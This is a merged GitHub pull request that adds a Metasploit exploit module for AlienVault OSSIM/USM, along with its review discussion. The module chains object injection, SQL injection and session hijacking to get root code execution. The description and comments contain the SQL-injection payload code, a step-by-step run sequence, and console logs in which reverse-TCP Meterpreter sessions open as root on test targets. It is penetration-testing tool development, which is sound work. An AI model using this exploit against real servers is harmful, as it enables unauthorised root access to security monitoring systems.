### PR TITLE
Add Module AlienVault OSSIM/USM Remote Code Execution

### PR DESCRIPTION
**Pull request by mdisec**
This module exploits object injection, authentication bypass and ip spoofing vulnerabities all together. As result, root privileged session is gained.

I've used [https://www.rapid7.com/db/modules/exploit/linux/http/alienvault_sqli_exec](https://www.rapid7.com/db/modules/exploit/linux/http/alienvault_sqli_exec) this modules techniques in order to get code execution -creating policy and action-. But this PR uses totally different vulnerabilities exists on later versions till 5.3.1. 

For the fellas who want to know details, I released a very detailed technical analysis about that journey at my blog [https://pentest.blog/unexpected-journey-into-the-alienvault-ossimusm-during-engagement/](https://pentest.blog/unexpected-journey-into-the-alienvault-ossimusm-during-engagement/). Feel free to comment :-)

## Verification

List the steps needed to make sure this thing works

- [x] Start `msfconsole`
- [ ] `use exploit/linux/http/alienvault_exec`
- [x] `set RHOST <target>
- [x] `set LHOST <local>`
- [x] `check`
- [x] **Verify** the output is `[+] <target>:443 The target is vulnerable`
- [x] Log in AlienVault with adminisrator account through your browser. Modules need to hijacked at least one session token from database.
- [x] `exploit`
- [x] **Verify** the following steps.
```
[*] Started reverse TCP handler on 12.0.0.1:4445 
[*] Hijacking administrator session
[+] Admin session token : PHPSESSID=2gbhp8j5f2af0vu5es5t3083q4
[*] Creating rogue action
[+] Action created: aWbhnZFHqYbUbNW
[*] Retrieving rogue action id
[+] Corresponding Action ID found: D62A1D4A6D3AEEA65F99B606B02197A1
[*] Retrieving policy ctx and group values
[+] CTX Value found: 5E22D6A9E79211E6B8E4000C29F647D7
[+] GROUP Value found: 00000000000000000000000000000000
[*] Creating a policy that uses our rogue action
[+] Policy created: ASdKHQOZVONGzfU
[*] Activating the policy
[+] Rogue policy activated
[*] Triggering the policy by performing SSH login attempt
[+] SSH - Failed authentication. That means our policy and action will be trigged..!
[*] Sending stage (38500 bytes) to 12.0.0.137
[*] Meterpreter session 6 opened (12.0.0.1:4445 -> 12.0.0.137:51674) at 2017-01-31 14:13:49 +0300
meterpreter > getuid
Server username: root
meterpreter >
```

Cinema

[asciicast](https://asciinema.org/a/1rducvhjd47vfhnw49aqsb2q5)

### CODE REVIEW

**Comment by mmetince** [comment]
Major differences between old module and this one.
- This modules exploits totally new vulnerabilities.
- Only similar part between two module is delivering & triggering payload. Old module creates a event that will be triggerered when non-existing page called but somehow this technique doesn't work for 5.2.x version anymore. Thus, I took a way to do similar stuff with SSH auth attempt.

Thus, I've decided to the send this as new module instead of upgrading older one without doing proper QA test.

**Comment by mmetince** [comment]
I just can't believe AlienVault wiped downloads.alienvault.com/c/download address right after this PR and article. I will upload AlienVault USM 5.2.5 version and then share the link over here.

**Comment by mmetince** [comment]
I've just found a mirror of download.alienvault.com that they don't aware of it. 
http://downloads.eu.alienvault.com/c/download

**Comment by wchen-r7** [comment]
I don't think the links on that page actually work?

**Comment by mmetince** [comment]
Here is the list of available version from that mirrior @wchen-r7.  I will try this module against other version as much as possible. I've just tried against AlienVault_OSSIM_64bits_5.0.0 and it worked. We could try against AlienVault-USM_trial_5.0.2.zip etc.

```
-rw-r--r--  1 root root 2782138219 Feb  2 12:39 AlienVault-USM_trial_4.10.0.zip
-rw-r--r--  1 root root 1239484806 Feb  2 12:40 AlienVault-USM_trial_4.11.0.zip
-rw-r--r--  1 root root 1310616425 Feb  2 12:40 AlienVault-USM_trial_4.12.0.zip
-rw-r--r--  1 root root 1314401820 Feb  2 12:41 AlienVault-USM_trial_4.12.1.zip
-rw-r--r--  1 root root 1290895502 Feb  2 12:41 AlienVault-USM_trial_4.13.0.zip
-rw-r--r--  1 root root 1382718988 Feb  2 12:42 AlienVault-USM_trial_4.14.0.zip
-rw-r--r--  1 root root 1421206694 Feb  2 12:43 AlienVault-USM_trial_4.15.0.zip
-rw-r--r--  1 root root 1401904159 Feb  2 12:43 AlienVault-USM_trial_4.15.1.zip
-rw-r--r--  1 root root 1400927761 Feb  2 12:43 AlienVault-USM_trial_4.15.2.zip
-rw-r--r--  1 root root 2364981778 Feb  2 12:44 AlienVault-USM_trial_4.3.1.zip
-rw-r--r--  1 root root 2343170130 Feb  2 12:45 AlienVault-USM_trial_4.3.2.zip
-rw-r--r--  1 root root 2326375919 Feb  2 12:46 AlienVault-USM_trial_4.3.3.1.zip
-rw-r--r--  1 root root 2624031246 Feb  2 12:46 AlienVault-USM_trial_4.4.0.zip
-rw-r--r--  1 root root 2561554777 Feb  2 12:47 AlienVault-USM_trial_4.4.1.zip
-rw-r--r--  1 root root 2581304068 Feb  2 12:47 AlienVault-USM_trial_4.5.0.zip
-rw-r--r--  1 root root 1283971059 Feb  2 12:48 AlienVault-USM_trial_4.6.0.zip
-rw-r--r--  1 root root 2662205428 Feb  2 12:48 AlienVault-USM_trial_4.6.1.zip
-rw-r--r--  1 root root 2705387258 Feb  2 12:49 AlienVault-USM_trial_4.7.0.zip
-rw-r--r--  1 root root 2758071213 Feb  2 12:49 AlienVault-USM_trial_4.8.0.zip
-rw-r--r--  1 root root 2760374743 Feb  2 12:50 AlienVault-USM_trial_4.9.0.zip
-rw-r--r--  1 root root 1494022219 Feb  2 12:37 AlienVault-USM_trial_5.0.0.zip
-rw-r--r--  1 root root 1501363307 Feb  2 12:37 AlienVault-USM_trial_5.0.1.zip
-rw-r--r--  1 root root 1481754283 Feb  2 12:38 AlienVault-USM_trial_5.0.2.zip
-rw-r--r--  1 root root 1500550100 Feb  2 12:38 AlienVault-USM_trial_5.3.0.zip
-rw-r--r--  1 root root 1553087337 Feb  2 12:38 AlienVault-USM_trial_5.3.3.zip
-rw-r--r--  1 root root 2207302427 Feb  2 12:44 AlienVault-USM_trial_rc4.2.2_rc116.zip
-rw-r--r--  1 root root  713031680 Feb  2 12:33 AlienVault_OSSIM_64Bits_4.2.iso
-rw-r--r--  1 root root  713031680 Feb  2 12:33 AlienVault_OSSIM_64Bits_4.3.4.iso
-rw-r--r--  1 root root  696254464 Feb  2 12:33 AlienVault_OSSIM_64Bits_4.3.iso
-rw-r--r--  1 root root  740294656 Feb  2 12:33 AlienVault_OSSIM_64bits_4.1.iso
-rw-r--r--  1 root root  780140544 Feb  2 12:30 AlienVault_OSSIM_64bits_4.11.0.iso
-rw-r--r--  1 root root  797966336 Feb  2 12:31 AlienVault_OSSIM_64bits_4.12.0.iso
-rw-r--r--  1 root root  796917760 Feb  2 12:31 AlienVault_OSSIM_64bits_4.13.0.iso
-rw-r--r--  1 root root  782237696 Feb  2 12:31 AlienVault_OSSIM_64bits_4.14.0.iso
-rw-r--r--  1 root root  784334848 Feb  2 12:32 AlienVault_OSSIM_64bits_4.15.0.iso
-rw-r--r--  1 root root  782237696 Feb  2 12:32 AlienVault_OSSIM_64bits_4.15.1.iso
-rw-r--r--  1 root root  784334848 Feb  2 12:32 AlienVault_OSSIM_64bits_4.15.2.iso
-rw-r--r--  1 root root  765460480 Feb  2 12:35 AlienVault_OSSIM_64bits_5.0.0.iso
-rw-r--r--  1 root root  763363328 Feb  2 12:35 AlienVault_OSSIM_64bits_5.0.1.iso
-rw-r--r--  1 root root  763363328 Feb  2 12:35 AlienVault_OSSIM_64bits_5.0.2.iso
-rw-r--r--  1 root root  658505728 Feb  2 12:36 AlienVault_OSSIM_64bits_5.3.0.iso
-rw-r--r--  1 root root  687865856 Feb  2 12:30 AlienVault_Ossim_64bits_4.10.0.iso
-rw-r--r--  1 root root  746586112 Feb  2 12:34 AlienVault_Ossim_64bits_4.6.0.iso
-rw-r--r--  1 root root  746586112 Feb  2 12:34 AlienVault_Ossim_64bits_4.6.1.iso
-rw-r--r--  1 root root  677380096 Feb  2 12:34 AlienVault_Ossim_64bits_4.8.0.iso
-rw-r--r--  1 root root  737148928 Feb  2 12:34 AlienVault_Ossim_64bits_alienvault4-4.0.3.iso
-rw-r--r--  1 root root  266156995 Feb  2 12:39 alienvault-ossim_4.15.2.tar.gz
-rw-r--r--  1 root root  274332113 Feb  2 12:36 alienvault-ossim_5.0.0.tar.gz
-rw-r--r--  1 root root  274474313 Feb  2 12:36 alienvault-ossim_5.0.1.tar.gz
-rw-r--r--  1 root root  274480637 Feb  2 12:36 alienvault-ossim_5.0.2.tar.gz
-rw-r--r--  1 root root  389165478 Feb  2 12:37 alienvault-ossim_5.3.0.tar.gz
-rw-r--r--  1 root root  832514048 Feb  2 12:29 alienvault_open_source_siem_3.1_32bits.iso
-rw-r--r--  1 root root  861497344 Feb  2 12:30 alienvault_open_source_siem_3.1_64bits.iso
```

**Comment by wvu-r7** [comment]
@mmetince: If it's worth saving once, save it twice with https://archive.org/web/.

**Comment by mmetince** [comment]
I've tested this module against following versions.

AlienVault USM 5.3.0, 5.2.5, 5.0.0, 4.15.11
AlienVault OSSIM 5.0.0, 4.6.1

I've got meterpreter without any issue.

**Comment by bwatters-r7** [comment]
Well.... now I just sit back and wait the 12 hours for this to download.

File: modules/exploits/linux/http/alienvault_exec.rb [hunk 1]
```diff
@@ -0,0 +1,322 @@
...
+
+  end
+
+
+  def exploit
+    # Hijacking Administrator session by exploiting objection injection vuln that end up with sqli
+    print_status("Hijacking administrator session")
+
+    sql = "SELECT id FROM sessions LIMIT 1"
+    p = "a:1:{s:4:\"type\";s:#{(sql.length + 58).to_s}:\"1 AND extractvalue(rand(),concat(0x3a3a3a,(#{sql}),0x3a3a3a))-- \";}"
```
Comment (brandonprry) [inline modules/exploits/linux/http/alienvault_exec.rb]: Nothing crazy, but I usually try to randomize the 0x3a3a3a used as markers here in the concat call.

Comment (brandonprry) [inline modules/exploits/linux/http/alienvault_exec.rb]: Using Rex::Text.rand_text_alpha(5) or something that is

**Comment by brandonprry** [comment]
This module works for me. Tested against 4.15.2.


```
$ ./msfconsole
                                                  

 ______________________________________________________________________________
|                                                                              |
|                   METASPLOIT CYBER MISSILE COMMAND V4                        |
|______________________________________________________________________________|
      \                                  /                      /
       \     .                          /                      /            x
        \                              /                      /
         \                            /          +           /
          \            +             /                      /
           *                        /                      /
                                   /      .               /
    X                             /                      /            X
                                 /                     ###
                                /                     # % #
                               /                       ###
                      .       /
     .                       /      .            *           .
                            /
                           *
                  +                       *

                                       ^
####      __     __     __          #######         __     __     __        ####
####    /    \ /    \ /    \      ###########     /    \ /    \ /    \      ####
################################################################################
################################################################################
# WAVE 4 ######## SCORE 31337 ################################## HIGH FFFFFFFF #
################################################################################
                                                           http://metasploit.com


       =[ metasploit v4.13.17-dev-4ee0531                 ]
+ -- --=[ 1617 exploits - 925 auxiliary - 279 post        ]
+ -- --=[ 471 payloads - 39 encoders - 9 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf > search alienvault
[!] Module database cache not built yet, using slow search

Matching Modules
================

   Name                                             Disclosure Date  Rank       Description
   ----                                             ---------------  ----       -----------
   auxiliary/gather/alienvault_iso27001_sqli        2014-03-30       normal     AlienVault Authenticated SQL Injection Arbitrary File Read
   auxiliary/gather/alienvault_newpolicyform_sqli   2014-05-09       normal     AlienVault Authenticated SQL Injection Arbitrary File Read
   auxiliary/gather/ms14_052_xmldom                 2014-09-09       normal     MS14-052 Microsoft Internet Explorer XMLDOM Filename Disclosure
   exploit/linux/http/alienvault_exec               2017-01-31       excellent  AlienVault OSSIM/USM Remote Code Execution
   exploit/linux/http/alienvault_sqli_exec          2014-04-24       excellent  AlienVault OSSIM SQL Injection and Remote Code Execution
   exploit/linux/ids/alienvault_centerd_soap_exec   2014-05-05       excellent  AlienVault OSSIM av-centerd Command Injection
   exploit/multi/browser/java_jre17_exec            2012-08-26       excellent  Java 7 Applet Remote Code Execution
   exploit/multi/browser/java_jre17_jmxbean         2013-01-10       excellent  Java Applet JMX Remote Code Execution
   exploit/multi/misc/xdh_x_exec                    2015-12-04       excellent  Xdh / LinuxNet Perlbot / fBot IRC Bot Remote Code Execution
   exploit/windows/browser/adobe_flash_otf_font     2012-08-09       normal     Adobe Flash Player 11.3 Kern Table Parsing Integer Overflow
   exploit/windows/browser/adobe_flash_regex_value  2013-02-08       normal     Adobe Flash Player Regular Expression Heap Overflow
   exploit/windows/browser/ms12_037_same_id         2012-06-12       normal     MS12-037 Microsoft Internet Explorer Same ID Property Deleted Object Handling Memory Corruption


msf > use exploit/linux/http/alienvault_exec 
msf exploit(alienvault_exec) > show options

Module options (exploit/linux/http/alienvault_exec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST                       yes       The target address
   RPORT      443              yes       The target port (TCP)
   SSL        true             no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The URI of the vulnerable Alienvault OSSIM instance
   VHOST                       no        HTTP server virtual host


Payload options (python/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Alienvault USM/OSSIM <= 5.3.0


msf exploit(alienvault_exec) > set RHOST 172.18.20.99
RHOST => 172.18.20.99
msf exploit(alienvault_exec) > check
[+] 172.18.20.99:443 The target is vulnerable.
msf exploit(alienvault_exec) > run

[-] Exploit failed: The following options failed to validate: LHOST.
[*] Exploit completed, but no session was created.
msf exploit(alienvault_exec) > set LHOST 172.18.20.13
LHOST => 172.18.20.13
msf exploit(alienvault_exec) > run

[*] Started reverse TCP handler on 172.18.20.13:4444 
[*] Hijacking administrator session
[+] Admin session token : PHPSESSID=sad2b48ub5neoeqe9kie0mu403
[*] Creating rogue action
[+] Action created: fgBOHVGiqIsFnwz
[*] Retrieving rogue action id
[+] Corresponding Action ID found: CF13212FA2866457831E29735872EE4B
[*] Retrieving policy ctx and group values
[+] CTX Value found: 5747C679F6BA11E68FBC080027FD25FF
[+] GROUP Value found: 00000000000000000000000000000000
[*] Creating a policy that uses our rogue action
[+] Policy created: JcXuPZUowmxLmXH
[*] Activating the policy
[+] Rogue policy activated
[*] Triggering the policy by performing SSH login attempt
[+] SSH - Failed authentication. That means our policy and action will be trigged..!
[*] Sending stage (38500 bytes) to 172.18.20.99
[*] Meterpreter session 1 opened (172.18.20.13:4444 -> 172.18.20.99:49801) at 2017-02-19 10:01:54 -0600

meterpreter >
```

**Comment by brandonprry** [comment]
This also works on version 5.0.1 for me

File: modules/exploits/linux/http/alienvault_exec.rb (hunk 1 above)
Comment (mmetince) [inline modules/exploits/linux/http/alienvault_exec.rb]: Yeah but I would like to leave this as is if it's not mandatory to do.

**Comment by bwatters-r7** [comment]
Thanks, @brandonprry!

**Comment by bwatters-r7** [comment]
# Release notes
This PR adds support to leverage a string of vulnerabilities in AlienVault's popular SEIM server software, OSSIM and USM; the end result of pairing these vulnerabilities is remote code execution as root.

**Comment by mmetince** [comment]
Thanks for review & landing @brandonprry @bwatters-r7 🙌

**Pull request merged**